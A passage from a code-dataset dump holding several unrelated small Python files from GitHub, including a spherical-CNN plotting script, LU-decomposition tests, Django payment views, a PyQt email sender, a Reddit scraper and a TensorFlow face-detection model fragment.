f.save()\n","repo_name":"eloitanguy/yt_audio_downloader","sub_path":"metadata_handler.py","file_name":"metadata_handler.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24071369255","text":"import sys\nimport os\nimport warnings\nimport argparse\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom os.path import abspath, dirname\nsys.path.append(dirname(dirname(abspath(__file__))))\n\nfrom spherical_cnn import sphericalcof\n\nfrom spherical_cnn import datasets\n\ntry:\n import pyshtools\nexcept:\n pass\n\n\nfrom spherical_cnn import util\nfrom spherical_cnn.util import tf_config\nfrom spherical_cnn import models\n\n\nshape = 1\nparser = argparse.ArgumentParser()\nparser.add_argument('--gpu', type=int, default=0, help='GPU to use [default: GPU 0]')\nparser.add_argument('--dset_dir', default='/media/SSD/DATA/ayman/papers/spherical-cnn/data/test/', help=' datasers directory ')\nparser.add_argument('--order', '-or', type=int, default=16,help='order of coefficients')\nparser.add_argument('--nchannels', default=1, type=int, help='Number of input channels')\nparser.add_argument('--input_res', '-res', type=int, default=64,help='resolution for spherical inputs; may subsample if larger')\n# parser.add_argument('--n_classes', '-nc', type=int, default=40, help='number of classes in dataset')\n# parser.add_argument('--num_point', type=int, default=1024, help='Point Number [default: 1024]')\n\nparser.add_argument('--dset', '-d', type=str, default='from_cached_tfrecords', help='dataset loader')\nparser.add_argument('--logdir', '-ld', type=str, default='', help='directory to save models, logs and checkpoints.')\nparser.add_argument('--dtype',type=str, default='float32', )\nparser.add_argument('--train_bsize', type=int, default=1)\nparser.add_argument('spectral_input', 
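# Example use of the save_metadata helper above, with tag values taken from
# TEMPLATE_METADATA; the file names are placeholders, and the audio file
# must already be an MP4/M4A container for mutagen's MP4 class to open it.
save_metadata(
    audio_filename="11 - Mice On Venus.m4a",
    title="Mice On Venus",
    artist="C418",
    album_artist="C418",
    album="Minecraft - Volume Alpha",
    track=11,
    track_total=24,
    date=2011,
    cover_filename="cover.jpg",
)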
action='store_false', default=False)\n\nargs = parser.parse_args()\n\nassert os.path.isdir(args.dset_dir)\n\ndset = datasets.load(args)\nindim = models.get_indim(args)\n# dsetarg = {'dset': dset}\n\n# read data\nx, y = util.tfrecord2np(dset[1]['fnames']['test'][0],\n indim,\n dtype=args.dtype)\nx= x/np.max(x)\n# X=(X>0)*1\n\n#choose record\n# for i in range(len(y)):\n# if y[i]==shape:\n# inputs = x[i]\n# break\n\n# x, y = util.tfrecord2np(dset[1]['fnames']['test'][0],\n# indim,\n# dtype=args.dtype)\ninputs = x[0]\ninputs_out = x[1]\n\n# choose centric sphere\n# input = inputs[...,8]\n# input_out = inputs_out[...,8]\n# if input.any()==0:\n# print('zero elements')\n# for i in range(3,10):\n# input = inputs[..., i]\n# input_out = inputs_out[..., i]\n# if input.any() != 0:\n# break\n\n# f = open('datain.txt', 'ab')\n# inp = np.array(x)\n#\n# for jj in range(7):\n# # f.write(str(inp[0,: ,:,jj]))\n# np.savetxt(f, inp[ 0, :, :, jj], fmt=\"%s\")\n# for jj in range(7):\n# np.savetxt(f, inp[ 1, :, :, jj], fmt=\"%s\")\n# f.close()\n\n\n\n# generate sh for resulotion res and a given order\n# sh = sphericalcof.sph_harm_all(args.input_res, order=args.input_res//4)\n\n# coeff= sphericalcof.sph_harm_transform(input, harmonics=sh,order=args.input_res//4)\ncoeff= sphericalcof.sph_harm_transform_batch(x, order=args.input_res//4)\ncoeff= tf.reshape(coeff, [2, -1])\nf = open('datainc.txt', 'ab')\ninp = np.array(x)\nnp.savetxt(f, inp[ 0, :])\nnp.savetxt(f, inp[ 1, :])\nf.close()\n\n\n\ncoeff_out= sphericalcof.sph_harm_transform(input_out, harmonics=sh,order=args.order)\n\ndef stack_uneven(arrays, fill_value=0.):\n '''\n Fits arrays into a single numpy array, even if they are\n different sizes. `fill_value` is the default value.\n\n Args:\n arrays: list of np arrays of various sizes\n (must be same rank, but not necessarily same size)\n fill_value (float, optional):\n\n Returns:\n np.ndarray\n '''\n # sizes = [np.shape(a) for a in arrays]\n results=[]\n # max_sizes = np.max(list(zip(*sizes)), -1)\n # The resultant array has stacked on the first dimension\n # result = np.full((len(arrays),) + tuple(max_sizes), fill_value)\n for i, a in enumerate(arrays):\n # The shape of this array `a`, turned into slices\n # slices = tuple(slice(0,s) for s in sizes[i])\n # Overwrite a block slice of `result` with this array `a`\n # result[i][slices] = a\n results = np.append(results, a)\n return results\n\n\ncoeff_s=stack_uneven(coeff)\ncoeff_outs=stack_uneven(coeff_out)\nnorm=coeff_outs/coeff_s\n\n# plot coeff\n# Prepare the data\ndegrees = np.linspace(0,args.order**2,args.order**2)\n# Plot the data\n# plt.plot(degrees,abs(coeff_s), label='clean')\n# plt.plot(degrees,abs(coeff_outs) , label='outliers')\n\nplt.plot(degrees,abs(norm) , label='norm')\n# Add a legend\nplt.legend()\n# Show the plot\nplt.show()\n\n# output= sphericalcof.sph_harm_inverse(coeff, res=args.input_res, harmonics=sh)\n\n","repo_name":"AymanMukh/R-SCNN","sub_path":"Image/test/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":4708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72194505747","text":"class WrongSummatorParametersException(Exception):\n def __init__(self):\n super(WrongSummatorParametersException, self).__init__(\n \"Summator's parameters is not vector or number\"\n )\n\n\nclass WrongSummatorVectorLengthsException(Exception):\n def __init__(self):\n super(WrongSummatorVectorLengthsException, self).__init__(\n \"Summator's vector parameters have different 
lengths\"\n )\n","repo_name":"kannabi/neural-bicycle","sub_path":"main/neuron/summators/array/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30892523305","text":"from cmt.a_converter import AConverter\nfrom cmt.cmap.v1 import *\nfrom cmt.cmap.v2 import *\nfrom cmt.ecmap.v4 import *\n\n\nclass Converter(AConverter):\n @staticmethod\n def convert(source: CMap_2) -> ECMap_4:\n ecmap = ECMap_4()\n ecmap.cmap = source\n ecmap.cmap.checkpoint_times = None\n return ecmap\n\n @staticmethod\n def downgrade(source: CMap_2) -> CMap_1:\n res = CMap_1()\n res.name = source.name\n res.checkpoint_times = source.checkpoint_times\n res.sun_rotation = source.sun_rotation_hor\n res.sun_angle = source.sun_rotation_ver\n res.camera_pos = source.camera_pos\n res.camera_look = source.camera_look\n\n for ent in source.entities:\n new_ent = None\n if type(ent) == Block_2:\n new_ent = Block_1()\n new_ent.block_type = ent.block_type\n new_ent.position = (int(ent.position[0]), int(ent.position[1]), int(ent.position[2]))\n new_ent.scale = (int(ent.scale[0]), int(ent.scale[1]), int(ent.scale[2]))\n new_ent.rotation_z = ent.rotation_z\n new_ent.checkpoint_nr = ent.checkpoint_nr\n new_ent.byte_size = ent.byte_size\n elif type(ent) == Sphere_2:\n new_ent = Sphere_1()\n new_ent.position = (int(ent.position[0]), int(ent.position[1]), int(ent.position[2]))\n elif type(ent) == PlayerStart_2:\n new_ent = PlayerStart_1()\n new_ent.position = (int(ent.position[0]), int(ent.position[1]), int(ent.position[2]))\n new_ent.rotation_z = ent.rotation_z\n elif type(ent) == Dummy_2:\n new_ent = Dummy_1()\n new_ent.id = ent.id\n new_ent.position = (int(ent.position[0]), int(ent.position[1]), int(ent.position[2]))\n new_ent.scale = (int(ent.scale[0]), int(ent.scale[1]), int(ent.scale[2]))\n new_ent.rotation_z = ent.rotation_z\n if new_ent is not None:\n res.entities.append(new_ent)\n return res\n\n @staticmethod\n def upgrade(source: CMap_2) -> 'CMap_3':\n raise ValueError(\n f\"Upgrading {source.identifier.name} {source.format_version} to\"\n f\" {source.identifier.name} {source.format_version + 1} is not supported.\"\n )\n","repo_name":"IceflowRE/cmt","sub_path":"cmt/converter/cmap_v2.py","file_name":"cmap_v2.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14266905827","text":"import os\nimport socket\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nhost = socket.gethostname() # Get local machine name\nport = 1233\n\ns.bind((host, port))\ns.listen(5)\n\n\nclient_socket, address = s.accept()\nprint(\"Conencted to - \", address, \"\\n\")\n\ndata = client_socket.recv(2048)\ndec = data.decode('utf8')\n#my_bytes = bytearray(data)\nprint(dec)\n\n\nprint(\"The following data was received - \", data)\n","repo_name":"ramosrafh/CD","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33002322591","text":"\nfrom numba import jit\nimport numpy as np\nfrom numpy.testing import assert_array_almost_equal\nfrom pytest import mark\n\nfrom .doolittle import lu_decomp\nfrom .lu_smorgasbord import (\n lu_0, lu_1, lu_2, lu_3, lu_4, lu_5,\n lu_parallel, lu_parallel_2\n)\nfrom .lu_c_fortran import lu_decomp_c_fortran\n\nSERIAL_FNS = [lu_decomp, lu_0, lu_1, 
lu_2, lu_3, lu_4, lu_5, lu_decomp_c_fortran]\nPARALLEL_FNS = [lu_parallel, lu_parallel_2]\nALL_FNS = SERIAL_FNS + PARALLEL_FNS\n\n\n@mark.parametrize('fn', ALL_FNS, ids=lambda f: f.__name__)\ndef test_doolittle_geeks_for_geeks(fn):\n \"\"\"\n This example is taken from the geeks for geeks\n website:\n https://www.geeksforgeeks.org/doolittle-algorithm-lu-decomposition/\n \"\"\"\n arr = np.array([\n [2, -1, -2],\n [-4, 6, 3],\n [-4, -2, 8]\n ])\n\n lower, upper = fn(arr)\n\n # basic sanity\n final = lower @ upper\n assert_array_almost_equal(final, arr)\n\n expected_lower = np.array([\n [ 1., 0., 0.],\n [-2., 1., 0.],\n [-2., -1., 1.],\n ])\n assert_array_almost_equal(expected_lower, lower)\n\n expected_upper = np.array([\n [2., -1., -2.],\n [0., 4., -1.],\n [0., 0., 3.]\n ])\n assert_array_almost_equal(upper, expected_upper)\n\n\n@mark.parametrize('fn', ALL_FNS, ids=lambda f: f.__name__)\ndef test_doolittle_chapter_7(fn):\n \"\"\" This example comes from the PDF of chapter 7:\n www.math.iit.edu/~fass/477577_Chapter_7.pdf\n\n also found in lu_decomp/literature\n \"\"\"\n arr = np.array([\n [1, 1, 1],\n [2, 3, 5],\n [4, 6, 8]\n ])\n\n lower, upper = fn(arr)\n\n assert_array_almost_equal(lower @ upper, arr)\n\n expected_lower = np.array([\n [1, 0, 0],\n [2, 1, 0],\n [4, 2, 1]\n ])\n\n assert_array_almost_equal(expected_lower, lower)\n\n expected_upper = np.array([\n [1, 1, 1],\n [0, 1, 3],\n [0, 0, -2]\n ])\n\n assert_array_almost_equal(expected_upper, upper)\n\n\n@mark.parametrize('fn', ALL_FNS, ids=lambda f: f.__name__)\ndef test_doolittle_ust_hk(fn):\n \"\"\" This is the example from Ch06 UST HK:\n https://www.math.ust.hk/~mamu/courses/231/Slides/CH06_5A.pdf\n\n also in literature/CH06_5A.pdf\n \"\"\"\n arr = np.array([\n [1, 1, 0, 3],\n [2, 1, -1, 1],\n [3, -1, -1, 2],\n [-1, 2, 3 , -1]\n ])\n\n lower, upper = fn(arr)\n\n assert_array_almost_equal(lower @ upper, arr)\n\n expected_lower = np.array([\n [1, 0, 0, 0],\n [2, 1, 0, 0],\n [3, 4, 1, 0],\n [-1, -3, 0, 1]\n ])\n\n assert_array_almost_equal(expected_lower, lower)\n\n expected_upper = np.array([\n [1, 1, 0, 3],\n [0, -1, -1, -5],\n [0, 0, 3, 13],\n [0, 0, 0, -13]\n ])\n\n assert_array_almost_equal(expected_upper, upper)\n\n\n@mark.parametrize('fn', SERIAL_FNS, ids=lambda f: f.__name__)\ndef test_lu_decomp_heavy(fn):\n arr = np.random.random((500, 500))\n lower, upper = jit(fn)(arr)\n assert_array_almost_equal(lower @ upper, arr)\n\n\n@mark.parametrize('fn', PARALLEL_FNS, ids=lambda f: f.__name__)\ndef test_lu_decomp_heavy_parallel(fn):\n arr = np.random.random((500, 500))\n lower, upper = fn(arr)\n assert_array_almost_equal(lower @ upper, arr)\n\n\nif __name__ == '__main__':\n import pytest\n pytest.main([__file__])\n","repo_name":"fastats/learning","sub_path":"performance/2017_12_LU_decomposition/python/test_doolittle.py","file_name":"test_doolittle.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"1345396670","text":"from decimal import Decimal\n\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.shortcuts import get_object_or_404, redirect\nfrom django.template.response import TemplateResponse\nfrom django.urls import reverse, reverse_lazy\nfrom django.views.generic import View\nfrom payments import RedirectNeeded, get_payment_model\nfrom plans.models import Order\n\n\nclass PaymentDetailView(LoginRequiredMixin, View):\n login_url = reverse_lazy(\"auth_login\")\n template_name = 
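# One plausible implementation of the lu_decomp interface that the tests
# above exercise: textbook Doolittle factorization with a unit diagonal on
# L. This is a sketch checked against the geeks-for-geeks example, not the
# project's actual lu_decomp (and it assumes no pivoting is required).
import numpy as np

def doolittle(a):
    a = np.asarray(a, dtype=float)
    n = a.shape[0]
    lower, upper = np.eye(n), np.zeros((n, n))
    for i in range(n):
        for j in range(i, n):      # row i of U
            upper[i, j] = a[i, j] - lower[i, :i] @ upper[:i, j]
        for j in range(i + 1, n):  # column i of L
            lower[j, i] = (a[j, i] - lower[j, :i] @ upper[:i, i]) / upper[i, i]
    return lower, upper

arr = [[2, -1, -2], [-4, 6, 3], [-4, -2, 8]]
low, up = doolittle(arr)
print(np.allclose(low @ up, arr))  # True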
\"plans_payments/payment.html\"\n\n def get(self, request, *args, payment_id=None):\n payment = get_object_or_404(\n get_payment_model(), order__user=request.user, id=payment_id\n )\n try:\n form = payment.get_form(data=request.POST or None)\n except RedirectNeeded as redirect_to:\n payment.save()\n return redirect(str(redirect_to))\n return TemplateResponse(\n request, \"plans_payments/payment.html\", {\"form\": form, \"payment\": payment}\n )\n\n\ndef get_client_ip(request):\n return request.META.get(\"REMOTE_ADDR\")\n\n\ndef create_payment_object(\n payment_variant, order, request=None, autorenewed_payment=False\n):\n Payment = get_payment_model()\n if (\n hasattr(order.user.userplan, \"recurring\")\n and order.user.userplan.recurring.payment_provider != payment_variant\n ):\n order.user.userplan.recurring.delete()\n return Payment.objects.create(\n variant=payment_variant,\n order=order,\n description=f\"{order.name} %s purchase\",\n total=Decimal(order.total()),\n tax=Decimal(order.tax_total()),\n currency=order.currency,\n delivery=Decimal(0),\n billing_first_name=order.user.first_name,\n billing_last_name=order.user.last_name,\n billing_email=order.user.email or \"\",\n billing_address_1=order.user.billinginfo.street,\n # billing_address_2=order.user.billinginfo.zipcode,\n billing_city=order.user.billinginfo.city,\n billing_postcode=order.user.billinginfo.zipcode,\n billing_country_code=order.user.billinginfo.country,\n # billing_country_area=order.user.billinginfo.zipcode,\n customer_ip_address=get_client_ip(request) if request else \"127.0.0.1\",\n autorenewed_payment=autorenewed_payment,\n )\n\n\nclass CreatePaymentView(LoginRequiredMixin, View):\n login_url = reverse_lazy(\"auth_login\")\n\n def get(self, request, *args, order_id=None, payment_variant=None):\n order = get_object_or_404(Order, pk=order_id, user=request.user)\n payment = create_payment_object(payment_variant, order, request)\n return redirect(reverse(\"payment_details\", kwargs={\"payment_id\": payment.id}))\n","repo_name":"PetrDlouhy/django-plans-payments","sub_path":"plans_payments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"41267546649","text":"from fpdf import FPDF\nimport os\n# create a instance of fpdf\npdf = FPDF()\npdf.set_auto_page_break(0)\n\npath = r'C:\\Users\\ahamm\\Desktop\\munseer'\nimg_list = [x for x in os.listdir(path)]\n\nfor img in img_list:\n image_path = os.path.join(path, img)\n if os.path.exists(image_path):\n pdf.add_page()\n pdf.image(image_path)\n\npdf.output(r\"C:\\Users\\ahamm\\Desktop\\PROJECT\\output\\sample.pdf\")","repo_name":"Nareshwill/playground","sub_path":"scratch_29.py","file_name":"scratch_29.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17173439916","text":"from PyQt5 import QtGui, QtCore\nfrom PyQt5.QtWidgets import QApplication, QFileDialog, QGridLayout, QHBoxLayout,QVBoxLayout, QLabel, QLineEdit, QMainWindow, QPushButton, QStyle, QTextEdit, QTimeEdit, QVBoxLayout, QWidget\nimport json\nfrom PyQt5.QtCore import QByteArray, QTimer, Qt\nimport smtplib\nfrom PyQt5.QtGui import QMovie\nimport time\nfrom mov import movie\n\n\nclass MyWindow(QMainWindow):\n def __init__(self, parent=None):\n super(MyWindow, self).__init__(parent)\n self.setGeometry(910, 200, 600, 500)\n\n with open ('json/newfile.json', 'r') as file:\n data= 
json.load(file)\n\n sender_mail= data['sender_mail']\n sender_pass= data['sender_pass']\n\n self.from_label= QLabel(\"From :\")\n self.from_label.setStyleSheet(\"font: 9pt;\" \"font-weight: bold;\" )\n self.from_label.setMaximumSize(70, 50)\n\n self.from_txt= QLineEdit(sender_mail)\n self.from_txt.setFixedWidth(380)\n self.from_txt.setFixedHeight(33)\n # self.from_txt.setReadOnly(True)\n self.from_txt.setStyleSheet(\"font: 8pt;\" \"font-weight: bold;\" )\n\n self.label1= QLabel(\"Subject :\")\n self.label1.setStyleSheet(\"font: 9pt;\" \"font-weight: bold;\" )\n\n self.line1= QTextEdit() \n self.line1.setMaximumSize(900,52)\n self.line1.setStyleSheet(\"font: 8pt;\" \"font-weight: bold;\" )\n \n self.label2= QLabel(\"Content :\")\n self.label2.setStyleSheet(\"font: 9pt;\" \"font-weight: bold;\" )\n self.line2= QTextEdit()\n\n self.send_btn= QPushButton(\"SEND\")\n self.send_btn.clicked.connect(self.send)\n self.send_btn.setStyleSheet(\"font: 9pt;\" \"font-weight: bold;\" )\n\n self.layout= QVBoxLayout()\n self.layout1= QHBoxLayout()\n\n self.layout.addLayout(self.layout1)\n\n self.layout1.addWidget(self.from_label)\n self.layout1.addWidget(self.from_txt, alignment= Qt.AlignLeft)\n\n self.layout.addWidget(self.label1)\n self.layout.addWidget(self.line1)\n self.layout.addWidget(self.label2)\n self.layout.addWidget(self.line2)\n self.layout.addWidget(self.send_btn, alignment= Qt.AlignRight)\n\n widget = QWidget()\n widget.setLayout(self.layout)\n\n self.setCentralWidget(widget) \n\n\n def send(self):\n print(self.line1.toPlainText())\n print(self.line2.toPlainText())\n with open ('json/newfile.json', 'r') as file:\n data= json.load(file) \n\n sender_mail= data['sender_mail']\n sender_pass= data['sender_pass']\n\n allmails= data['reciever_mail']\n print(allmails)\n valid_mails= []\n invalid_mails= []\n mail_subject= self.line1.toPlainText()\n mail_content= self.line2.toPlainText() \n \n for item in range ( len(allmails) ) :\n self.movie = QMovie('g.gif' , QByteArray(), self)\n self.movie.setSpeed(100)\n self.label2.setMovie(self.movie)\n self.movie.start() \n QApplication.processEvents() \n time.sleep(3) \n each_mail= data['reciever_mail'][item]\n\n print(\"mail: \" +data['reciever_mail'][item]) \n\n sent_from = sender_mail\n to = each_mail #, 'bill@gmail.com' \n subject = mail_subject\n body = mail_content+ \"\\n\\n- VITAM\"\n\n email_text = \"\"\"\\\n From: %s\n To: %s\n Subject: %s\n\n %s\n \"\"\" % (sent_from, \", \".join(to), subject, body)\n\n try:\n server = smtplib.SMTP_SSL('smtp.gmail.com', 465)\n server.ehlo()\n server.login(sender_mail, sender_pass)\n server.sendmail(sent_from, to, email_text)\n server.close()\n\n print ('Email sent!')\n valid_mails.append(each_mail)\n except:\n print('Something went wrong...')\n invalid_mails.append(each_mail)\n self.label2.setText('Content :')\n\n\n def signal(self):\n self.movie = QMovie('photos/giphy.gif' , QByteArray(), self)\n self.movie.setSpeed(100)\n # QApplication.processEvents() \n self.label2.setMovie(self.movie)\n self.movie.start() \n # self.send() \n\n def stop(self):\n self.movie.stop() \n\n\n# if __name__ == \"__main__\":\n# import sys\n\n# app = QApplication(sys.argv)\n# app.setApplicationName('Mail')\n\n# main = MyWindow()\n# main.setWindowIcon(QtGui.QIcon(\"photos/mail.svg\"))\n\n# main.show()\n\n# 
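# The email above is assembled by hand-formatting a string; the standard
# library's email.message.EmailMessage handles headers and encoding for you.
# A minimal alternative sketch (a swapped-in technique, not the file's
# original approach; same Gmail SMTP-over-SSL endpoint as above):
import smtplib
from email.message import EmailMessage

def send_mail(sender, password, recipient, subject, body):
    msg = EmailMessage()
    msg["From"], msg["To"], msg["Subject"] = sender, recipient, subject
    msg.set_content(body)
    with smtplib.SMTP_SSL("smtp.gmail.com", 465) as server:
        server.login(sender, password)
        server.send_message(msg)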
sys.exit(app.exec_())","repo_name":"DGhanShyam/PythonGUI","sub_path":"mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":4645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27444190784","text":"import praw\r\nimport datetime\r\nimport pandas as pd\r\nimport json\r\n\r\ndef define_credentials():\r\n with open('credentials.json') as json_file:\r\n data = json.load(json_file)\r\n reddit = praw.Reddit(\r\n client_id=data[\"client_id\"],\r\n client_secret=data[\"client_secret\"],\r\n user_agent=data[\"user_agent\"]\r\n )\r\n return reddit\r\n\r\n\r\ndef get_data(subreddit):\r\n reddit = define_credentials()\r\n subreddit = reddit.subreddit(subreddit)\r\n posts = subreddit.new(limit=10)\r\n ids = []\r\n timestamps = []\r\n comment_num = []\r\n score = []\r\n title = []\r\n for post in posts:\r\n ids.append(post.id)\r\n timestamps.append(datetime.datetime.fromtimestamp(post.created_utc, tz=datetime.timezone.utc))\r\n comment_num.append(post.num_comments)\r\n score.append(post.score)\r\n title.append(post.title)\r\n dict_posts = {\r\n \"id\": ids,\r\n \"timestamp\": timestamps,\r\n \"comment_num\" : comment_num,\r\n \"score\": score,\r\n \"title\": title\r\n }\r\n posts = pd.DataFrame(dict_posts)\r\n return posts\r\n\r\n","repo_name":"weronikakedzior/large-scale-data-processing","sub_path":"l2/project_1/app/reddit_scraper.py","file_name":"reddit_scraper.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35340562112","text":"import numpy as np\r\nimport tensorflow as tf\r\nfrom CFG.config import FLAGS\r\nfrom Prepare_TrainDataSet.GetMiniBatch import GetMiniBatch\r\nimport tensorflow.contrib.slim as slim\r\n#slim = tf.contrib.slim\r\nnum_filters_list = [32, 64, 128, 256]\r\n\r\n\r\ndef loss_branch(input_data, prefix_name, mask=None, label=None, deploy_flag=False):\r\n branch_conv1 = slim.conv2d(input_data, num_filters_list[2], [1,1],1,'VALID')\r\n # branch_conv1 = tf.nn.conv2d(input_data, filter=[1,1,num_filters_list[0],num_filters_list[2]],strides=[1,1,1,1],padding='VALID',name=prefix_name + '_1')\r\n # branch_relu1 = tf.nn.relu(branch_conv1, name='relu_' + prefix_name + '_1')\r\n\r\n # face classification,这里是是获得预测人脸概率的特征图\r\n branch_conv2_score = slim.conv2d(branch_conv1, num_filters_list[2], [1,1],1,'VALID')\r\n #branch_conv2_score = tf.nn.conv2d(branch_relu1, filter=[1,1,num_filters_list[2],num_filters_list[2]],strides=[1,1,1,1],padding='VALID',name=prefix_name + '_2_score')\r\n #branch_relu2_score = tf.nn.relu(branch_conv2_score, name='relu_' + prefix_name + '_2_score')\r\n branch_conv3_score = slim.conv2d(branch_conv2_score, 2 , [1,1],1,'VALID', activation_fn=None)\r\n #branch_conv3_score = tf.nn.conv2d(branch_relu1, filter=[1,1,num_filters_list[2],2],strides=[1,1,1,1],padding='VALID',name=prefix_name + '_3_score')\r\n\r\n branch_conv2_bbox = slim.conv2d(branch_conv1, num_filters_list[2], [1,1],1,'VALID')\r\n # branch_conv2_bbox = tf.nn.conv2d(branch_relu1, filter=[1, 1, num_filters_list[2], num_filters_list[2]],\r\n # strides=[1, 1, 1, 1], padding='VALID', name=prefix_name + '_2_bbox')\r\n # branch_relu2_bbox = tf.nn.relu(branch_conv2_score, name='relu_' + prefix_name + '_2_bbox')\r\n branch_conv3_bbox = slim.conv2d(branch_conv2_bbox, 4 , [1,1],1,'VALID', activation_fn=None)\r\n # branch_conv3_bbox = tf.nn.conv2d(branch_relu1, filter=[1, 1, num_filters_list[2], 4], strides=[1, 1, 1, 1],\r\n # padding='VALID', 
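# Example use of the Reddit scraper above; it assumes credentials.json
# exists with the three fields define_credentials() reads, and the
# subreddit name here is illustrative.
posts = get_data("learnpython")
print(posts[["timestamp", "score", "title"]].head())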
name=prefix_name + '_3_bbox')\r\n\r\n if deploy_flag:\r\n predict_score = tf.nn.softmax(branch_conv3_score,axis=1)\r\n #predict_score = tf.slice(predict_score,)\r\n predict_bbox = branch_conv3_bbox\r\n return predict_score, predict_bbox\r\n else:\r\n #总共有6层分割出前面两层,代表正负样本\r\n mask_score = tf.slice(mask, [0,0,0,0],[input_data.shape[0], input_data.shape[1],input_data.shape[2], 2],name='mask_score')\r\n mask_score_reshape = tf.reshape(mask_score,[-1,2])\r\n mask_score_reshape_sum = tf.reduce_sum(mask_score_reshape,axis=1)\r\n positive_index = tf.where(tf.equal(mask_score_reshape_sum, 0) )\r\n positive_mask_score = tf.gather(mask_score_reshape,positive_index,axis= 0 )\r\n #positive_mask_score_shape = tf.shape(positive_mask_score)\r\n\r\n\r\n\r\n label_score = tf.slice(label, [0, 0, 0, 0],\r\n [input_data.shape[0], input_data.shape[1], input_data.shape[2], 2], name='label_score')\r\n label_score_reshape = tf.reshape(label_score,[-1,2])\r\n positive_label_score = tf.gather(label_score_reshape,positive_index,axis= 0 )\r\n #mask_filter = tf.multiply(branch_conv3_score,mask_score)\r\n #loss_score = tf.nn.softmax_cross_entropy_with_logits_v2(label_score, mask_filter, axis=3)\r\n loss_score = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(positive_label_score,positive_mask_score,axis=1) )\r\n\r\n\r\n #负样本的mask_batch[loop, 0:2, :, :] = 1 后面mask_batch[loop, 2:6, :, :] = 0\r\n #正样本的mask_batch[loop, 0:2, :, :] = 0 后面mask_batch[loop, 2:6, :, :] = 1\r\n #对于正样本来说,score_gray_flag 那么分类就可以置为0,但是回归却是location_green_flag 才可以置为1.缩小了范围。\r\n mask_bbox = tf.slice(mask, [0,0,0,2],[input_data.shape[0], input_data.shape[1],input_data.shape[2], 4],name='mask_bbox')\r\n mask_bbox_reshape = tf.reshape(mask_bbox, [-1,4])\r\n mask_bbox_reshape_sum = tf.reduce_sum(mask_bbox_reshape, axis=1)\r\n positive_bbox_index = tf.where(tf.equal(mask_bbox_reshape_sum, 0))\r\n positive_bbox_mask = tf.gather(mask_bbox_reshape,positive_bbox_index, axis=0)\r\n\r\n label_bbox = tf.slice(label, [0, 0, 0, 2],\r\n [input_data.shape[0], input_data.shape[1], input_data.shape[2], 4], name='label_bbox')\r\n label_bbox_reshape = tf.reshape(label_bbox,[-1, 4])\r\n positive_bbox_label = tf.gather(label_bbox_reshape, positive_bbox_mask, axis=0)\r\n loss_bbox = tf.reduce_mean( tf.reduce_sum(tf.abs(tf.sub(positive_bbox_mask, positive_bbox_label) ), axis = 1) )\r\n\r\n return loss_bbox, loss_score\r\n\r\n\r\ndef inference(input,masks, labels, deploy_flag=False):\r\n #480 - 3 + 1 / 2 = 478/2 = 239 不填充\r\n mask_1 = masks[0]\r\n mask_2 = masks[1]\r\n mask_3 = masks[2]\r\n mask_4 = masks[3]\r\n\r\n label_1 = labels[0]\r\n label_2 = labels[1]\r\n label_3 = labels[2]\r\n label_4 = labels[3]\r\n#239,239\r\n conv1 = slim.conv2d(input,num_filters_list[1], [3,3], 2,'VALID')\r\n#119,119\r\n #239 - 3 + 1 / 2 = 237 / 2 = 118.5 = 119\r\n conv2 = slim.conv2d(conv1,num_filters_list[1], [3,3], 2,'VALID')\r\n\r\n #59\r\n conv3 = slim.conv2d(conv2,num_filters_list[1], [3,3], 2,'VALID')\r\n\r\n # 59/1 = 59\r\n conv4 = slim.conv2d(conv3,num_filters_list[1], [3,3], 1,'SAME')\r\n\r\n\r\n conv5 = slim.conv2d(conv4,num_filters_list[1], [3,3], 1,'SAME')\r\n\r\n conv6 = slim.conv2d(conv5,num_filters_list[1], [3,3], 1,'SAME')\r\n # conv6 = tf.nn.conv2d(relu5, [3, 3, num_filters_list[1], num_filters_list[1]], strides=[1, 1, 1, 1],padding='SAME',name='conv6')\r\n # relu6 = tf.nn.relu(conv6, name='relu6')\r\n\r\n conv7 = slim.conv2d(conv6, num_filters_list[1], [3, 3], 1, 'SAME')\r\n\r\n conv8 = slim.conv2d(conv7, num_filters_list[1], [3, 3], 1, 'SAME')\r\n # conv8 = 
